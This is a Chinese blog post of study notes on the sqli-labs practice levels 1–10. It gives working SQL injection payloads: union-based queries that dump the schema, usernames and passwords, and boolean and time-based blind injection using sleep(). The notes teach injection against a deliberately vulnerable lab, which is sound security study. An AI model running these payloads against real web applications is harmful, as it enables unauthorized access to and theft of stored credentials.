1_10

最新推荐文章于 2022-05-18 21:25:23 发布
最新推荐文章于 2022-05-18 21:25:23 发布
阅读量174 收藏
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46261035/article/details/104337468
版权

一些词汇
information_schema.columns包含所有表的字段
table_schema 数据库名
table_name 表名
column_name 列名
group_concat()函数功能:将group by产生的同一个分组中的值连接起来,返回一个字符串结果。注入方式1:数字型注入——无需闭合。
2:单引号闭合——以’和–+闭合。
3:单引号和括号闭合——以’)和–+闭合。
4:双引号闭合——以"和–+闭合。
5:双引号和括号闭合——以")和–+闭合。
注释符号有 --+ -+ #
Less-1
输入?id=1页面显示正常然后判断闭合方式,输入/?id=1’–+,页面正常,因此该关为单引号闭合。
【神奇的插不上图就不插了】
接着用order by查询字段数,输入?id=1’ order by 5–+页面显示错误,尝试后得到有三个字段,接着用union联合查询,输入/?id=0’ union select 1,2,3–+,(此处应该有图)然后输入/?id=0’ union select 1,(select database()),3–+查询本地数据库
输入/?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),3–+查询所有数据库
输入/?id=0’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),3–+查询security数据库中的数据表
输入/?id=0’ union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=‘security’),3–+查询security数据库中的users数据表的字段名
输入/?id=0’ union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)–+查询security数据库中的user数据表中的数据
Less-2
输入/?id=1正常,输入/?id=1’–+或/?id=1’)–+都错误,为数字型注入,不需要闭合
Less-3
输入/?id=1正常,输入/?id=1’–+错误,输入/?id=1’)–+页面显示正常,以’)和–+闭合
Less-4
输入/?id=1正常,输入/?id=1’–+和/?id=1’)–+页面正常,用order by 查询字段数时页面没变化,换成/?id=1") order by 4–+变化,以")和–+闭合
2-4其余参考1
Less-5
本关可以采用报错注入或者布尔盲注,参考了贾龙涛的做法
布尔盲注:
(1)mid()函数:mid(string,start,length)
(2)substr()函数: substr(string,start,length)
(3)left()函数: left(string,length)
(4)ascii()函数: 把某一个字符转为ascii值。(可将字符转成ascii值比较)
(5)limit(m,n)函数: 索引从m到n的数据。string:规定要返回的字符串。start:规定在字符串的何处开始(初始值为1)。length:规定被返回字符串的长度(可以省略,若省略则返回剩余所有文本)
布尔盲注的原理是根据页面返回的是true还是false来判断比较的字母是否正确。在函数后输入>‘a’,判断页面是否有变化,若页面无变化则会真,若页面为空,则为假,以此判断首字母,通过更改字符的位置,判断其他字母。利用 left(database(),1)进行尝试 输入 http://127.0.0.1/sqllib/Less-5/?id=1%27and%20left(version(),1)=5%23
输入?id=1%27and%20length(database())=8%23等到数据库长度为8
猜测数据库第一位 (已知security)
输入?id=1%27and%20left(database(),1)%3E%27a%27–+能看出s大于a, 所以返回正确接下来运用利用 substr() ascii()函数:ascii(substr((select table_name information_schema.tables wheretables_schema=database()limit 0,1),1,1))=10 Less-6闭合条件为双引号闭合,其余参考5
Less-7
认识的都没写我也跳了
Less-8
布尔盲注
输入?id=1’ and If(ascii(substr(database(),1,1))=115,1,sleep(5))–+得到首字母为s同样的测试得到数据库名
Less-9
延迟盲注
输入?id=1’ and if(ascii(substr(database(),1,1))>115, 0, sleep(5))#,页面延迟后响应,判断闭合方式为单引号。输入?id=1’ and if(ascii(substr(database(),2,1))>115, 0, sleep(5))#得到数据库名security接下来推测出表名Less-10
双引号闭合,将9中的’换为” 即可

懒二
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs笔记(二)
Lyn_10086的博客
10-22 221
sqli-lbs笔记:test 2 主要还是参考了《sqlilabs过关手册注入天书》,参考的其他一些各种零散的文章, 链接放在文末。 一、盲注类型 盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面,此时,需要利用一些方法进行判断或者尝试,这个过程称之为盲注。 二、布尔盲注 主要是通过构造逻辑判断 相关函数:left(),substr(),ascii(),ORD(),MID(),regexp正则,like匹配, 三、基于报错的sql盲注 主要是通过构造payload让信息
渗透学习-sql注入过程中遇到的问题-针对sort=left(version(),1)的解释-对order by后接字符串的理解
qq_43696276的博客
06-07 398
这里主要是针对于在我打靶场过程中遇到的一些问题进行解释,即在sqllibs的Less46关使用sort=left(version(),1)依旧能够正常回显的原因,以及对order by后接上字符串即varchar字符类型也能正常回显的解释。...
sql-lib之order by 注入
weixin_43803070的博客
05-07 1949
前言: 如何判断是否存在order by之后的注入? 在参数后面加个asc(结果升序显示)、desc(结果降序显示)来观察其顺序是否改变就行了。顺序改变了,所以存在注入。 接下来我们进行正式注入: 一、 首先我们判断order by后面接的参数有没有影响,尝试注入:left(version(),1)和right(version(),1),发现结果没影响,说明后面参数随意。这里我们解释一下这两个...
SQL盲注及python脚本编写
nobugnomoney的博客
05-18 3498
1、什么是盲注 盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。从 background-1 中,我们可以知道盲注分为三类 基于布尔 SQL 盲注 基于时间的 SQL 盲注 基于报错的 SQL 盲注 0x01.基于布尔 SQL 盲注----------构造逻辑判断 left() :left(a,b)从左侧截取 a 的前 b 位 accii():Ascii()将某个字符转换 为 ascii
SQL注入知识总结v1.0
Monsterlz123的博客
07-14 479
【SQL注入】SQL注入学习笔记总结 Hello 各位小伙伴周末晚上好~ 话说最近有小伙伴在公众号留言问我: “小编,怎么盗QQ号?” “小编,在某某网站用什么代码就可以免费充值?” “小编,能不能帮我攻击一下某某网站?” 第一步,首先目标得有可以利用的漏洞才行,不存在什么万能代码的… 第二步,第二步之后的行为都是违反网络安全法的!!! 我们要做遵纪守法,维护国家网络安全的白帽子~ 而不是...
1_10.py
11-13
1_10.py
XalanMessages_1_10.dll
11-21
XalanMessages_1_10
10.Group1_10.flv
最新发布
03-13
10.Group1_10
C_10_1_10.zip
05-07
博客 Visual C# (十)使用数组 --中的扑克牌游戏的源代码,上传的是一个压缩文件,解压后用Visual Studio 2019打开文件C_10_1_10.sln,应该就会在Visual Studio中加载这个解决方案,然后选择菜单栏的调试选择开始...
Xalan-C_1_10.dll
11-21
Xalan-C_1_10
浅谈lumen的自定义依赖注入
01-20
比如我现在有个token认证系统,目前我用mysql的token表实现,将来有可能会改成redis,怎么实现未来的无缝连接呢。 先定义一个合约文件app/Contracts/TokenHandler.php <?php namespace App\Contracts; /** * 处理Token的Contracts * @package App\Contracts */ interface TokenHandler { /** * 创建一个token * @param $userId integer 用户Id * @return string */ public
布尔盲注
m0_52880296的博客
05-06 4049
一.布尔盲注原理: 布尔盲注一般适用于页面没有回显字段(不支持联合查询),且web页面返回True 或者 false, 构造SQL语句, 利用and,or等关键字来其后的语句 true 、 false使web页面返回true或者false, 从而达到注入的目的来获取信息的一种方法 没有错误提示 也没有回显 但是输入错误的话页面会有反应 也就是说 只有 true 和false 例如 :sql-labs /less-7 它只有两种提示 所以可以用布尔盲注 playload:and length(databas
SQL注入学习记录一
一只菜鸡
02-22 723
前置知识: 1.mysql数据库的一些基本使用:增删改查 2.python脚本的使用 3.了解php中常见的与mysql相关的函数和类 0x01:数据库基础 1.基础操作 查看库名: mysql> show databases; 创建库: mysql> creat database test; 删除库: mysql> drop database test; 使用库: mysql> user test 创建表: mysql> create table test( -> `i
SQLi_Labs通关文档
dl71181的博客
07-22 758
SQLi_Labs通关文档 先列举一下sql基础语句 showdatabases; //查看数据库usexxx; //使用某个数据库showtables; //查看该数据库的数据表desc xxx; //查看该数据表的结构select*fromxxx; //查找某个数据表的所有内容selectschema_namefrominformation_schema.s...
SQLi_Labs通关文档【1-65关】
weixin_30491641的博客
07-23 725
SQLi_Labs通关文档【1-65关】 为了不干扰自己本机环境,SQL-LAB我就用的码头工人,跑起来的,搭建也非常简单,也就两条命令 dockerpullacgpiano/sqli-labsdockerrun-dt--namesqli-lab-p[你要映射的端口]:80acgpiano/sqli-labs:latest 然后在SQL-LAB上直接初始化数...
SQLi攻击介绍
bylfsj的博客
09-18 859
一、盲注攻击 a.常用方法 1.判断当前主数据库版本 left(version(),1)=5# 2.判断数据库密码 之前类似,爆库、表、列,无非换成判断条件。 and ascii(substring((select password from users where id =1),1,1))=49 3.利用事件延迟判断正误 union select if(substring(password,...
WEB漏洞 常见类型
weixin_38170137的博客
08-09 445
常见的类型有以下:SQL注入、XSS跨站脚本攻击、恶意文件上传、一句话木马连接等。 SQL注入: 漏洞特征:存在SQL注入语句 常见的SQL注入语句有: ●通过报错注入、布尔盲注、时间盲注判断是否存在注入: ⊙字符型 ■ 参数后加单引号,报错:sql1.php?name=admin' ■ 参数后加' and '1'='2和' and '1'='2,访问正常:sql1.php?...
MySql学习笔记——进阶(三)
雨山林稀的博客
06-12 241
(一)常用函数: 1. 字符串函数; 2. 数值函数; 3. 日期和时间函数; 4. 流程函数; 5. 其他常用函数。 (二)事务: 1. ACID; 2. 使用; 3. 并发问题; 4. 隔离级别。 (三)权限: (三)权限: 1. 权限的分类; 2. 权限的操作。
sql注入常用函数
weixin_41489908的博客
11-18 3156
​当所有情绪都堆在一起的时候,才发现自己已经不是那个一块糖就能开心的小孩子了。。。 ---- 网易云热评 一、MySql注入常用函数 1、system_user()系统用户名 2、user()用户名 3、current_user()当前用户名 4、session_user()链接数据库的用户名 5、database()数据库名 6、version()数据库版本 7、@@datadir数据库路径 8、@@basedir数据库安装路径 9、@@version_conpile_os操作系统.
将马里兰大学电池数据集中的CS2_35_1_10_11文件进行数据增强处理,写出完整python代码
06-11
好的,以下是将马里兰大学电池数据集中的CS2_35_1_10_11文件进行数据增强处理的Python代码: ```python import pandas as pd from sklearn.utils import shuffle from scipy.signal import savgol_filter # 读取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值